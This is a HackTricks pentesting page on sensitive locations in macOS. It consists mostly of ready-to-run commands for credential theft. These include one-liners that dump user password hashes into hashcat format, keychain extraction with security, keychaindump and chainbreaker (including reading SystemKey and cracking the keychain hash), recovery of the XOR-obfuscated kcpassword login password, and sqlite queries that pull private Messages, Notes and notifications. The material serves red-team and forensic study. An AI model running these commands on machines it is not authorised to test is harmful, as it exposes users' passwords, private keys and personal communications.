# macOS Sensitive Locations

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

## Passwords ### Shadow Passwords Shadow password is stored with the user's configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**.\ The following oneliner can be use to dump **all the information about the users** (including hash info): {% code overflow="wrap" %} ```bash for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done ``` {% endcode %} [**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. An alternative one-liner which will dump creds of all non-service accounts in hashcat format `-m 7100` (macOS PBKDF2-SHA512): {% code overflow="wrap" %} ```bash sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done' ``` {% endcode %} ### Keychain Dump Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation. ```bash #security secuirty dump-trust-settings [-s] [-d] #List certificates security list-keychains #List keychain dbs security list-smartcards #List smartcards security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root) ``` ### [Keychaindump](https://github.com/juuso/keychaindump) {% hint style="danger" %} Based on this comment [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like these tools aren't working anymore in Big Sur. {% endhint %} ### Keychaindump Overview A tool named **keychaindump** has been developed to extract passwords from macOS keychains, but it faces limitations on newer macOS versions like Big Sur, as indicated in a [discussion](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760). The use of **keychaindump** requires the attacker to gain access and escalate privileges to **root**. The tool exploits the fact that the keychain is unlocked by default upon user login for convenience, allowing applications to access it without requiring the user's password repeatedly. However, if a user opts to lock their keychain after each use, **keychaindump** becomes ineffective. **Keychaindump** operates by targeting a specific process called **securityd**, described by Apple as a daemon for authorization and cryptographic operations, crucial for accessing the keychain. The extraction process involves identifying a **Master Key** derived from the user's login password. This key is essential for reading the keychain file. To locate the **Master Key**, **keychaindump** scans the memory heap of **securityd** using the `vmmap` command, looking for potential keys within areas flagged as `MALLOC_TINY`. The following command is used to inspect these memory locations: ```bash sudo vmmap | grep MALLOC_TINY ``` After identifying potential master keys, **keychaindump** searches through the heaps for a specific pattern (`0x0000000000000018`) that indicates a candidate for the master key. Further steps, including deobfuscation, are required to utilize this key, as outlined in **keychaindump**'s source code. Analysts focusing on this area should note that the crucial data for decrypting the keychain is stored within the memory of the **securityd** process. An example command to run **keychaindump** is: ```bash sudo ./keychaindump ``` ### chainbreaker [**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: * Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/) * Internet Passwords * Generic Passwords * Private Keys * Public Keys * X509 Certificates * Secure Notes * Appleshare Passwords Given the keychain unlock password, a master key obtained using [volafox](https://github.com/n0fate/volafox) or [volatility](https://github.com/volatilityfoundation/volatility), or an unlock file such as SystemKey, Chainbreaker will also provide plaintext passwords. Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information. #### **Dump keychain keys** ```bash #Dump all keys of the keychain (without the passwords) python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain ``` #### **Dump keychain keys (with passwords) with SystemKey** ```bash # First, get the keychain decryption key # To get this decryption key you need to be root and SIP must be disabled hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo ## Use the previous key to decrypt the passwords python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` #### **Dump keychain keys (with passwords) cracking the hash** ```bash # Get the keychain hash python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain # Crack it with hashcat hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt # Use the key to decrypt the passwords python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` #### **Dump keychain keys (with passwords) with memory dump** [Follow these steps](..#dumping-memory-with-osxpmem) to perform a **memory dump** ```bash #Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords # Unformtunately volafox isn't working with the latest versions of MacOS python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump #Try to extract the passwords using the extracted keychain passwords python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain ``` #### **Dump keychain keys (with passwords) using users password** If you know the users password you can use it to **dump and decrypt keychains that belong to the user**. ```bash #Prompt to ask for the password python2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db ``` ### kcpassword The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure). The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused.\ This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d). ## Interesting Information in Databases ### Messages ```bash sqlite3 $HOME/Library/Messages/chat.db .tables sqlite3 $HOME/Library/Messages/chat.db 'select * from message' sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets' ``` ### Notifications You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/` Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable** or use **`strings`**. To access it you can do: {% code overflow="wrap" %} ```bash cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/ strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack ``` {% endcode %} ### Notes The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite` {% code overflow="wrap" %} ```bash sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables #To dump it in a readable format: for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done ``` {% endcode %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!